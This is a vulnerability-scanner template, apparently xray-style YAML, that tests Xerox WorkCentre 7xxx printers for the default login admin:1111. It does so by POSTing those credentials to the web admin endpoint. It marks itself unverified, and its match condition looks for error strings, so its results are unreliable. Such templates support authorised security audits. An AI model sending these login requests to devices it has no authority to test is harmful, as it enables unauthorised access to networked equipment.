xerox-workcentre7-default-password: Xerox WorkCentre 7xxx - Default Login

2025-08-01 Xerox WorkCentre 7 PoC Public

Description

Testing default credentials admin:1111 on Xerox WorkCentre 7xxx printer.

PoC

id: xerox-workcentre7-default-password

info:
  name: Xerox WorkCentre 7xxx - Default Login
  author: MiroslavSotak
  severity: high
  verified: false
  description: |-
    Testing default credentials admin:1111 on Xerox WorkCentre 7xxx printer.
  tags: xerox,default-login
  created: 2023/06/24

rules:
  r0:
    request:
      method: POST
      path: /userpost/xerox.set
      body: _fun_function=HTTP_Authenticate_fn&NextPage=%2Fproperties%2Fauthentication%2FluidLogin.php&webUsername=admin&webPassword=1111&frmaltDomain=default
    expression: response.status == 200 && response.body.bcontains(b'window.opener.top.location.pathname') && response.body.bcontains(b'Xerox Corporation')  && (response.body.bcontains(b'invalid') || response.body.bcontains(b'errmsg'))
expression: r0()

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities